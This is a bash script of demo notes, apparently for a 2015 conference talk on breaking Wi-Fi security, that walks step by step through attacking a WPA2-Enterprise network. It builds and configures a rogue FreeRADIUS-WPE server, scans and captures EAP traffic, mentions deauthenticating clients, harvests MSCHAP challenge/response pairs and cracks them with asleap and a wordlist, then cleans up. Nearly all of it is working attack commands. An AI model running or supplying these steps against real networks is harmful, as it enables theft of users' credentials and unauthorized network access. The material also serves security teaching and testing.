#!/bin/bash
# Tested on Kali GNU/Linux 1.1.0 as of 2015-07-06

## Kali environment setup
# Install FreeRADIUS-WPE 2.1.12 with the patch
wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2
wget https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch
tar -jxvf freeradius-server-2.1.12.tar.bz2
cd freeradius-server-2.1.12
patch -p1 < ../freeradius-wpe.patch
./configure
make
make install
ldconfig
cd ..
# Update the FreeRADIUS-WPE config file to enable ntdomain_hack
sed -i 's/#\twith_ntdomain_hack = no/\twith_ntdomain_hack = yes/' /usr/local/etc/raddb/modules/mschap
# Verify FreeRADIUS-WPE has been installed properly and is the right version
radiusd -v

## A third way to scan the airwaves so we know where to direct our attacks
service network-manager stop
airmon-ng start wlan0
kismet
# Set a source of mon0, then Close Console Window for better view
# option+k,shift+q,enter to quit

# In this example I have a wired connection (192.168.230.0/24) to an external router that is the Authenticator.  If this is not the case, you can use hostapd with a wireless NIC that supports Master Mode (aka AP mode).
# Set the global secret to PittsburghCodeAndSupply on FreeRADIUS-WPE
sed -i 's/\tsecret\t\t= testing123/\tsecret\t\t= PittsburghCodeAndSupply/' /usr/local/etc/raddb/clients.conf
# Configure the Authenticator in FreeRADIUS-WPE
cat << EOF >> /usr/local/etc/raddb/clients.conf
client router {
	ipaddr = 192.168.230.1
	netmask = 32
	secret = PittsburghCodeAndSupply
	nastype = other
}
EOF
# Configure the AP/Authenticator to use the correct shared secret - probably via the web UI - and point it to FreeRADIUS-WPE's listener
# Verify the shared secret is the same in clients.conf as on the AP

## Ensure connectivity to the Router
ifconfig eth0 192.168.230.2 netmask 255.255.255.0
ping 192.168.230.1

## Start the malicious RADIUS server
radiusd -s -X

## Capture some sample traffic in order to identify the EAP mode in use
airodump-ng mon0 --bssid <Test AP> --channel 6 --write /root/Desktop/2015-07-07\ -\ Pittsburgh\ Code\ and\ Supply\ -\ Breaking\ Wireless\:\ \ The\ Dos\ and\ Don\'ts\ of\ Wi-Fi/WPA2-Enterprise_Demo

## Evaluate the sample traffic to find the EAP mode
wireshark /root/Desktop/2015-07-07\ -\ Pittsburgh\ Code\ and\ Supply\ -\ Breaking\ Wireless\:\ \ The\ Dos\ and\ Don\'ts\ of\ Wi-Fi/WPA2-Enterprise_Demo-01.cap
# Enter a filter to show specific traffic
eapol and wlan and frame and (wlan.da == <Test Client> || wlan.sa == <Test Client>)

## Configure FreeRADIUS-WPE to use the EAP mode identified by the earlier step (In this case, EAP-PEAP)
sed -i 's/\t\tdefault_eap_type = md5/\t\tdefault_eap_type = peap/' /usr/local/etc/raddb/eap.conf

## Connect to the AP with a client, or deauth an existing client

## Retrieve the challenge/response
tail /usr/local/var/log/radius/freeradius-server-wpe.log

## Crack the challenge/response
asleap -C <Challenge> -R <Response> -W /usr/share/wordlists/rockyou.txt
# Example
asleap -C 26:8f:38:45:f8:e7:ef:c4 -R f6:48:a8:0b:59:23:54:53:c9:c1:a5:ea:05:bf:9b:36:9a:30:6b:2e:fb:fe:b1:ab -W /usr/share/wordlists/rockyou.txt

## Cleanup
airmon-ng stop mon0
rm /root/Desktop/2015-07-07\ -\ Pittsburgh\ Code\ and\ Supply\ -\ Breaking\ Wireless\:\ \ The\ Dos\ and\ Don\'ts\ of\ Wi-Fi/WPA2-Enterprise_Demo-01.{cap,csv,kismet}*
sed -i 's/\twith_ntdomain_hack = yes/#\twith_ntdomain_hack = no/' /usr/local/etc/raddb/modules/mschap
sed -i 's/\tsecret\t\t= PittsburghCodeAndSupply/\tsecret\t\t= testing123/' /usr/local/etc/raddb/clients.conf
sed -i 's/\t\tdefault_eap_type = peap/\t\tdefault_eap_type = md5/' /usr/local/etc/raddb/eap.conf
sed -e :a -e '$d;N;2,6ba' -e 'P;D' -i /usr/local/etc/raddb/clients.conf
ifdown eth0;ifup eth0;sleep 1;ifconfig eth0
service network-manager start
